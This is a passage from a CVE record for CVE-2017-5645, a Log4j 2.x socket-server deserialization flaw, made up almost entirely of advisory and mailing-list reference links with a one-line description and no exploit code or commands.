1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Closed] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Resolved] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200114 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2%40%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200115 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad%40%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Resolved] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200127 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200208 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Resolved] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf%40%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c%40%3Cissues.activemq.apache.org%3E", }, { name: "[logging-commits] 20200425 svn commit: r1059809 - /websites/production/logging/content/log4j/2.13.2/security.html", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d%40%3Ccommits.logging.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { tags: [ "x_refsource_CONFIRM", ], url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { name: "[bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E", }, { name: "[activemq-issues] 20200730 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397%40%3Cissues.activemq.apache.org%3E", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "[doris-commits] 20210402 [GitHub] [incubator-doris] zh0122 opened a new pull request #5594: [FE][Bug]Update log4j-web to fix a security issue", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422%40%3Ccommits.doris.apache.org%3E", }, { name: "[beam-issues] 20210528 [jira] [Created] (BEAM-12422) Vendored gRPC 1.36.0 is using a log4j version with security issues", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287%40%3Cissues.beam.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik opened a new pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] edited a comment on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f%40%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] suztomo commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", tags: [ "mailing-list", "x_refsource_MLIST", ], url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44%40%3Cgithub.beam.apache.org%3E", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { tags: [ "x_refsource_MISC", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], x_legacyV4Record: { CVE_data_meta: { ASSIGNER: "security@apache.org", ID: "CVE-2017-5645", STATE: "PUBLIC", }, affects: { vendor: { vendor_data: [ { product: { product_data: [ { product_name: "Apache Log4j", version: { version_data: [ { version_value: "All versions between 2.0-alpha1 and 2.8.1", }, ], }, }, ], }, vendor_name: "Apache Software Foundation", }, ], }, }, data_format: "MITRE", data_type: "CVE", data_version: "4.0", description: { description_data: [ { lang: "eng", value: "In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code.", }, ], }, problemtype: { problemtype_data: [ { description: [ { lang: "eng", value: "Remote Code Execution.", }, ], }, ], }, references: { reference_data: [ { name: "RHSA-2017:2888", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2888", }, { name: "RHSA-2017:2809", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2809", }, { name: "97702", refsource: "BID", url: "http://www.securityfocus.com/bid/97702", }, { name: "1041294", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1041294", }, { name: "RHSA-2017:2810", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2810", }, { name: "RHSA-2017:1801", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:1801", }, { name: "RHSA-2017:2889", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2889", }, { name: "RHSA-2017:2635", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2635", }, { name: "RHSA-2017:2638", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2638", }, { name: "RHSA-2017:1417", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:1417", }, { name: "RHSA-2017:2423", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2423", }, { name: "RHSA-2017:2808", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2808", }, { name: "1040200", refsource: "SECTRACK", url: "http://www.securitytracker.com/id/1040200", }, { name: "RHSA-2017:2636", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2636", }, { name: "RHSA-2017:3399", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:3399", }, { name: "RHSA-2017:2637", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2637", }, { name: "RHSA-2017:3244", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:3244", }, { name: "RHSA-2017:3400", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:3400", }, { name: "RHSA-2017:2633", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2633", }, { name: "RHSA-2017:2811", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:2811", }, { name: "RHSA-2017:1802", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2017:1802", }, { name: "RHSA-2019:1545", refsource: "REDHAT", url: "https://access.redhat.com/errata/RHSA-2019:1545", }, { name: "[druid-commits] 20191115 [GitHub] [incubator-druid] ccaominh opened a new pull request #8878: Address security vulnerabilities", refsource: "MLIST", url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe@%3Ccommits.druid.apache.org%3E", }, { name: "[logging-dev] 20191215 Re: Is there any chance that there will be a security fix for log4j-v1.2.17?", refsource: "MLIST", url: "https://lists.apache.org/thread.html/e8fb7d76a244ee997ba4b217d6171227f7c2521af8c7c5b16cba27bc@%3Cdev.logging.apache.org%3E", }, { name: "[logging-dev] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", refsource: "MLIST", url: "https://lists.apache.org/thread.html/eea03d504b36e8f870e8321d908e1def1addda16adda04327fe7c125@%3Cdev.logging.apache.org%3E", }, { name: "[oss-security] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", refsource: "MLIST", url: "http://www.openwall.com/lists/oss-security/2019/12/19/2", }, { name: "[announce] 20191218 [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", refsource: "MLIST", url: "https://lists.apache.org/thread.html/84cc4266238e057b95eb95dfd8b29d46a2592e7672c12c92f68b2917@%3Cannounce.apache.org%3E", }, { name: "[logging-dev] 20191219 Re: [CVE-2019-17571] Apache Log4j 1.2 deserialization of untrusted data in SocketServer", refsource: "MLIST", url: "https://lists.apache.org/thread.html/0dcca05274d20ef2d72584edcf8c917bbb13dbbd7eb35cae909d02e9@%3Cdev.logging.apache.org%3E", }, { name: "[activemq-issues] 20191226 [jira] [Created] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/8ab32b4c9f1826f20add7c40be08909de9f58a89dc1de9c09953f5ac@%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Created] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/44491fb9cc19acc901f7cff34acb7376619f15638439416e3e14761c@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191226 [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/277b4b5c2b0e06a825ccec565fa65bd671f35a4d58e3e2ec5d0618e1@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20191230 [jira] [Created] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/479471e6debd608c837b9815b76eab24676657d4444fcfd5ef96d6e6@%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20191230 [jira] [Created] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/6114ce566200d76e3cc45c521a62c2c5a4eac15738248f58a99f622c@%3Cissues.activemq.apache.org%3E", }, { name: "[tika-dev] 20200106 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf2567488cfc9212b42e34c6393cfa1c14e30e4838b98dda84d71041f@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200107 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r3a85514a518f3080ab1fc2652cfe122c2ccf67cfb32356acb1b08fe8@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200108 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rc1eaed7f7d774d5d02f66e49baced31e04827a1293d61a70bd003ca7@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200110 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r681b4432d0605f327b68b9f8a42662993e699d04614de4851c35ffd1@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 Re: [jira] [Commented] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ra38785cfc0e7f17f8e24bebf775dd032c033fadcaea29e5bc9fffc60@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Closed] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r746fbc3fc13aee292ae6851f7a5080f592fa3a67b983c6887cdb1fc5@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200111 [jira] [Resolved] (TIKA-3018) log4j 1.2 version used by Apache Tika 1.23 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rdec0d8ac1f03e6905b0de2df1d5fcdb98b94556e4f6cccf7519fdb26@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200114 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rca24a281000fb681d7e26e5c031a21eb4b0593a7735f781b53dae4e2@%3Cdev.tika.apache.org%3E", }, { name: "[tika-dev] 20200115 [jira] [Commented] (TIKA-3019) [9.8] [CVE-2019-17571] [tika-app] [1.23]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r4b25538be50126194cc646836c718b1a4d8f71bd9c912af5b59134ad@%3Cdev.tika.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rd5dbeee4808c0f2b9b51479b50de3cc6adb1072c332a200d9107f13e@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r7bcdc710857725c311b856c0b82cee6207178af5dcde1bd43d289826@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Updated] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/raedd12dc24412b3780432bf202a2618a21a727788543e5337a458ead@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Assigned] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r2ff63f210842a3c5e42f03a35d8f3a345134d073c80a04077341c211@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200122 [jira] [Resolved] (AMQ-7372) [9.8] [CVE-2019-17571] [activemq-all] [5.15.10]", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r3d666e4e8905157f3c046d31398b04f2bfd4519e31f266de108c6919@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200127 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r61590890edcc64140e0c606954b29a063c3d08a2b41d447256d51a78@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200208 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r2ce8d26154bea939536e6cf27ed02d3192bf5c5d04df885a80fe89b3@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/re8c21ed9dd218c217d242ffa90778428e446b082b5e1c29f567e8374@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Resolved] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rb1b29aee737e1c37fe1d48528cb0febac4f5deed51f5412e6fdfe2bf@%3Cissues.activemq.apache.org%3E", }, { name: "[activemq-issues] 20200228 [jira] [Updated] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r18f1c010b554a3a2d761e8ffffd8674fd4747bcbcf16c643d708318c@%3Cissues.activemq.apache.org%3E", }, { name: "[logging-commits] 20200425 svn commit: r1059809 - /websites/production/logging/content/log4j/2.13.2/security.html", refsource: "MLIST", url: "https://lists.apache.org/thread.html/ra9a682bc0a8dff1c5cefdef31c7c25f096d9121207cf2d74e2fc563d@%3Ccommits.logging.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuapr2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuapr2020.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html", }, { name: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", refsource: "CONFIRM", url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { name: "https://www.oracle.com/security-alerts/cpujul2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", refsource: "CONFIRM", url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { name: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", refsource: "MISC", url: "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2020.html", }, { name: "https://security.netapp.com/advisory/ntap-20181107-0002/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20181107-0002/", }, { name: "https://security.netapp.com/advisory/ntap-20180726-0002/", refsource: "CONFIRM", url: "https://security.netapp.com/advisory/ntap-20180726-0002/", }, { name: "https://issues.apache.org/jira/browse/LOG4J2-1863", refsource: "CONFIRM", url: "https://issues.apache.org/jira/browse/LOG4J2-1863", }, { name: "[bookkeeper-issues] 20200729 [GitHub] [bookkeeper] padma81 opened a new issue #2387: Security vulnerabilities in the apache/bookkeeper-4.9.2 image", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E", }, { name: "[activemq-issues] 20200730 [jira] [Commented] (AMQ-7370) log4j 1.2 version used by AMQ 5.15.10 / 5.15.11 is vulnerable to CVE-2019-17571", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r3784834e80df2f284577a5596340fb84346c91a2dea6a073e65e3397@%3Cissues.activemq.apache.org%3E", }, { name: "[geode-issues] 20200831 [jira] [Created] (GEODE-8471) Dependency security issues in geode-core-1.12", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuoct2020.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { name: "[doris-commits] 20210402 [GitHub] [incubator-doris] zh0122 opened a new pull request #5594: [FE][Bug]Update log4j-web to fix a security issue", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rcbb79023a7c8494cb389cd3d95420fa9e0d531ece0b780b8c1f99422@%3Ccommits.doris.apache.org%3E", }, { name: "[beam-issues] 20210528 [jira] [Created] (BEAM-12422) Vendored gRPC 1.36.0 is using a log4j version with security issues", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r0831e2e52a390758ce39a6193f82c11c295175adce6e6307de28c287@%3Cissues.beam.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuApr2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rbfa7a0742be4981a3f9356a23d0e1a5f2e1eabde32a1a3d8e41420f8@%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] lukecwik opened a new pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r23369fd603eb6d62d3b883a0a28d12052dcbd1d6d531137124cd7f83@%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r9d5c1b558a15d374bd5abd2d3ae3ca7e50e796a0efdcf91e9c5b4cdd@%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] codecov[bot] edited a comment on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/r94b5aae09c4bcff5d06cf641be17b00bd83ba7e10cad737bf16a1b8f@%3Cgithub.beam.apache.org%3E", }, { name: "[beam-github] 20210701 [GitHub] [beam] suztomo commented on pull request #15113: [BEAM-12422] Upgrade log4j version not affected by CVE-2017-5645", refsource: "MLIST", url: "https://lists.apache.org/thread.html/rdbd579dc223f06af826d7de340218ee2f80d8b43fa7e4decb2a63f44@%3Cgithub.beam.apache.org%3E", }, { name: "https://www.oracle.com/security-alerts/cpuoct2021.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { name: "https://www.oracle.com/security-alerts/cpujan2022.html", refsource: "MISC", url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], }, }, }, }, cveMetadata: { assignerOrgId: 